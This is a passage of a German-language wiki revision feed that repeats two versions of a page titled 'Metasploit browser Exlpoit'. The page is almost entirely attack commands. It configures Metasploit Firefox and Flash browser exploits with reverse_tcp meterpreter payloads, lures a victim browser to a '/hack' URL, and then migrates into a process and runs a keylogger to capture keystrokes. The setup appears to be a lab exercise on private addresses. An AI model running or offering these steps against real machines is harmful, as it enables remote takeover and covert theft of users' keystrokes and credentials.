=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
starte metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup Opfer&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===on the console===&lt;br /&gt;
metasploit konsole starten&lt;br /&gt;
*msfconsole&lt;br /&gt;
auswahl des exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
auswahl der schadsoftware&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
setzen des localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
setzen des webservers&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
pfad zum hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
ausführen des exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=auf dem opfer=&lt;br /&gt;
*gehen mit win7 auf http://192.168.244.150:8080/hack&lt;br /&gt;
=auf dem hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==vorgehnsweise==&lt;br /&gt;
session betreten&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18414</id>
		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18414"/>
		<updated>2019-09-02T09:54:56Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* vorgehen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup Opfer=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
starte metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup Opfer&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===auf der konsole===&lt;br /&gt;
metasploit konsole starten&lt;br /&gt;
*msfconsole&lt;br /&gt;
auswahl des exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
auswahl der schadsoftware&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
setzen des localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
setzen des webservers&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
pfad zum hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
ausführen des exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=auf dem opfer=&lt;br /&gt;
*gehen mit win7 auf http://192.168.244.150:8080/hack&lt;br /&gt;
=auf dem hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==vorgehnsweise==&lt;br /&gt;
session betreten&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
</feed>